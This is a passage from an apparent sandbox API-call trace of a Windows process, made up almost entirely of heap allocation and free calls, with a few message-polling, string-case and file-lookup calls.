Size=0x8) returned 0x43e2130 [0125.795] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9890 [0125.795] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2150 [0125.795] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1797088 [0125.795] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9950 [0125.795] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2320 [0125.795] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8de0 [0125.795] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9950 | out: hHeap=0x1780000) returned 1 [0125.795] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e22f0 [0125.795] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e22f0 | out: hHeap=0x1780000) returned 1 [0125.795] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9950 [0125.795] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc0) returned 0x1b22250 [0125.795] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8de0 | out: hHeap=0x1780000) returned 1 [0125.795] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9950 | out: hHeap=0x1780000) returned 1 [0125.795] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1797088 | out: hHeap=0x1780000) returned 1 [0125.795] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2150 | out: hHeap=0x1780000) returned 1 [0125.795] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2130 | out: hHeap=0x1780000) returned 1 [0125.795] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43c9950 [0125.795] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf630 [0125.796] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9e60 [0125.796] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2150 [0125.796] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9c80 [0125.796] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9e78 [0125.796] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8c30 [0125.796] PeekMessageW (in: lpMsg=0x144f534, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f534) returned 0 [0125.796] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2240 [0125.796] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2160 [0125.796] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796fc8 [0125.796] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796fc8 | out: hHeap=0x1780000) returned 1 [0125.796] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2160 | out: hHeap=0x1780000) returned 1 [0125.796] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2240 | out: hHeap=0x1780000) returned 1 [0125.796] PeekMessageW (in: lpMsg=0x144f534, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f534) returned 0 [0125.796] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2130 [0125.796] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf658 [0125.796] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9c50 [0125.796] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e22f0 [0125.796] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9c68 [0125.796] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e22f0 | out: hHeap=0x1780000) returned 1 [0125.796] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\tK8Qmak8ns0qz6I3UcG.wav", lpFindFileData=0x144f078 | out: lpFindFileData=0x144f078*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x37376ed0, ftCreationTime.dwHighDateTime=0x1d5eaa9, ftLastAccessTime.dwLowDateTime=0x382ebf10, ftLastAccessTime.dwHighDateTime=0x1d5e954, ftLastWriteTime.dwLowDateTime=0x382ebf10, ftLastWriteTime.dwHighDateTime=0x1d5e954, nFileSizeHigh=0x0, nFileSizeLow=0xff62, dwReserved0=0x101b1fc, dwReserved1=0x8, cFileName="tK8Qmak8ns0qz6I3UcG.wav", cAlternateFileName="TK8QMA~1.WAV")) returned 0x41ac500 [0125.797] FindClose (in: hFindFile=0x41ac500 | out: hFindFile=0x41ac500) returned 1 [0125.797] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9c68 | out: hHeap=0x1780000) returned 1 [0125.797] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9c50 | out: hHeap=0x1780000) returned 1 [0125.797] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf658 | out: hHeap=0x1780000) returned 1 [0125.797] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2200 [0125.797] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796de8 [0125.797] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e22f0 [0125.797] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x43923b0 [0125.797] CharUpperBuffW (in: lpsz="_WINAPI_FILEINUSE", cchLength=0x11 | out: lpsz="_WINAPI_FILEINUSE") returned 0x11 [0125.797] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43923b0 | out: hHeap=0x1780000) returned 1 [0125.797] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e22f0 | out: hHeap=0x1780000) returned 1 [0125.797] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf658 [0125.797] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e21d0 [0125.797] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf810 [0125.797] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9bd8 [0125.797] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2180 [0125.797] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9dd0 [0125.797] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2180 | out: hHeap=0x1780000) returned 1 [0125.797] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43c9d88 [0125.797] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf428 [0125.798] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9bf0 [0125.798] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e22f0 [0125.798] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9bf0 | out: hHeap=0x1780000) returned 1 [0125.798] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf388 [0125.798] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9c50 [0125.798] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9b90 [0125.798] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a9188 [0125.798] PeekMessageW (in: lpMsg=0x144f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f114) returned 0 [0125.798] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf838 [0125.798] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9bf0 [0125.798] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2300 [0125.798] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9c20 [0125.798] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9c38 [0125.798] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2230 [0125.798] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9c38 | out: hHeap=0x1780000) returned 1 [0125.798] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e21f0 [0125.798] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x43921b8 [0125.798] CharUpperBuffW (in: lpsz="_WINAPI_CREATEFILEEX", cchLength=0x14 | out: lpsz="_WINAPI_CREATEFILEEX") returned 0x14 [0125.798] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43921b8 | out: hHeap=0x1780000) returned 1 [0125.798] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e21f0 | out: hHeap=0x1780000) returned 1 [0125.798] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf7c0 [0125.798] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2160 [0125.798] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf450 [0125.799] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9c38 [0125.799] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2180 [0125.799] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9c68 [0125.799] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2180 | out: hHeap=0x1780000) returned 1 [0125.799] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2180 [0125.799] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9c98 [0125.799] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e21c0 [0125.799] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e21c0 | out: hHeap=0x1780000) returned 1 [0125.799] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e21c0 [0125.799] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9cb0 [0125.799] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e21e0 [0125.799] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e21e0 | out: hHeap=0x1780000) returned 1 [0125.799] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43c9cc8 [0125.799] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf360 [0125.799] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9ce0 [0125.799] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e21e0 [0125.799] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9ce0 | out: hHeap=0x1780000) returned 1 [0125.799] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf4a0 [0125.799] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9ce0 [0125.799] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9d10 [0125.799] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf888 [0125.799] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9e00 [0125.799] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e21f0 [0125.800] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9e00 | out: hHeap=0x1780000) returned 1 [0125.800] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfb08 [0125.800] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9cf8 [0125.800] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfc48 [0125.800] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9d70 [0125.800] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2220 [0125.800] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9d28 [0125.800] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2240 [0125.800] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2240 | out: hHeap=0x1780000) returned 1 [0125.800] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf8b0 [0125.800] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9d40 [0125.800] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2240 [0125.800] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9d58 [0125.800] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26c0 [0125.800] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26c0 | out: hHeap=0x1780000) returned 1 [0125.800] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfa18 [0125.800] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9e00 [0125.800] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2630 [0125.800] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9e00 | out: hHeap=0x1780000) returned 1 [0125.800] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4392030 [0125.800] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9e00 [0125.800] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26c0 [0125.800] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26c0 | out: hHeap=0x1780000) returned 1 [0125.800] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf9c8 [0125.801] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca658 [0125.801] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26d0 [0125.801] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca658 | out: hHeap=0x1780000) returned 1 [0125.801] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfc70 [0125.801] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca538 [0125.801] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25f0 [0125.801] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25f0 | out: hHeap=0x1780000) returned 1 [0125.801] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfa68 [0125.801] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4c0 [0125.801] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25f0 [0125.801] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4c0 | out: hHeap=0x1780000) returned 1 [0125.801] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfb80 [0125.801] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca550 [0125.801] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a90b0 [0125.801] PeekMessageW (in: lpMsg=0x144ebfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ebfc) returned 0 [0125.801] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfa90 [0125.801] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca568 [0125.801] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26c0 [0125.801] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca610 [0125.801] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca670 [0125.801] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2700 [0125.801] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca670 | out: hHeap=0x1780000) returned 1 [0125.801] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfab8 [0125.801] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca640 [0125.802] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2610 [0125.802] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca598 [0125.802] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2610 | out: hHeap=0x1780000) returned 1 [0125.802] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4f0 [0125.802] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2580 [0125.802] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca700 [0125.802] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2580 | out: hHeap=0x1780000) returned 1 [0125.802] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca760 [0125.802] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25a0 [0125.802] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca658 [0125.802] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25a0 | out: hHeap=0x1780000) returned 1 [0125.802] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca670 [0125.802] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2560 [0125.802] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca5b0 [0125.802] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2560 | out: hHeap=0x1780000) returned 1 [0125.802] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6b8 [0125.802] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2610 [0125.802] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca688 [0125.802] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2610 | out: hHeap=0x1780000) returned 1 [0125.802] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6a0 [0125.802] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2660 [0125.802] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca778 [0125.802] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2660 | out: hHeap=0x1780000) returned 1 [0125.803] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6d0 [0125.803] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2580 [0125.803] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2580 | out: hHeap=0x1780000) returned 1 [0125.803] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6e8 [0125.803] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25a0 [0125.803] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca718 [0125.803] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25a0 | out: hHeap=0x1780000) returned 1 [0125.803] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8c78 [0125.803] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfab8 | out: hHeap=0x1780000) returned 1 [0125.803] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca730 [0125.803] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25d0 [0125.803] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25d0 | out: hHeap=0x1780000) returned 1 [0125.803] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca490 [0125.803] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2660 [0125.803] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4a8 [0125.803] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2660 | out: hHeap=0x1780000) returned 1 [0125.803] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4c0 [0125.803] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2680 [0125.803] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2680 | out: hHeap=0x1780000) returned 1 [0125.803] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4d8 [0125.803] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2710 [0125.803] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca928 [0125.803] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2710 | out: hHeap=0x1780000) returned 1 [0125.803] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca988 [0125.804] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25a0 [0125.804] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25a0 | out: hHeap=0x1780000) returned 1 [0125.804] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca820 [0125.804] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25d0 [0125.804] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca910 [0125.804] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25d0 | out: hHeap=0x1780000) returned 1 [0125.804] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca958 [0125.804] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25d0 [0125.804] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25d0 | out: hHeap=0x1780000) returned 1 [0125.804] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca868 [0125.804] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2660 [0125.804] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa78 [0125.804] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2660 | out: hHeap=0x1780000) returned 1 [0125.804] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x80) returned 0x41a5250 [0125.804] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8c78 | out: hHeap=0x1780000) returned 1 [0125.804] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca790 [0125.804] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2580 [0125.804] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2580 | out: hHeap=0x1780000) returned 1 [0125.804] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2580 [0125.804] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9b8 [0125.804] CharLowerBuffW (in: lpsz="handle", cchLength=0x6 | out: lpsz="handle") returned 0x6 [0125.804] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7f0 [0125.804] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2660 [0125.805] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2640 [0125.805] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca940 [0125.805] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7f0 | out: hHeap=0x1780000) returned 1 [0125.823] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2660 | out: hHeap=0x1780000) returned 1 [0125.823] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca940 | out: hHeap=0x1780000) returned 1 [0125.823] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2640 | out: hHeap=0x1780000) returned 1 [0125.823] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfc98 [0125.823] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2560 [0125.823] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca838 [0125.823] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2670 [0125.823] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25b0 [0125.823] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8b0 [0125.823] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca838 | out: hHeap=0x1780000) returned 1 [0125.823] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2670 | out: hHeap=0x1780000) returned 1 [0125.823] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8b0 | out: hHeap=0x1780000) returned 1 [0125.823] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25b0 | out: hHeap=0x1780000) returned 1 [0125.823] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2610 [0125.823] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca940 [0125.823] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2640 [0125.823] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2590 [0125.823] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca850 [0125.823] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca940 | out: hHeap=0x1780000) returned 1 [0125.823] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2640 | out: hHeap=0x1780000) returned 1 [0125.823] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca850 | out: hHeap=0x1780000) returned 1 [0125.823] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2590 | out: 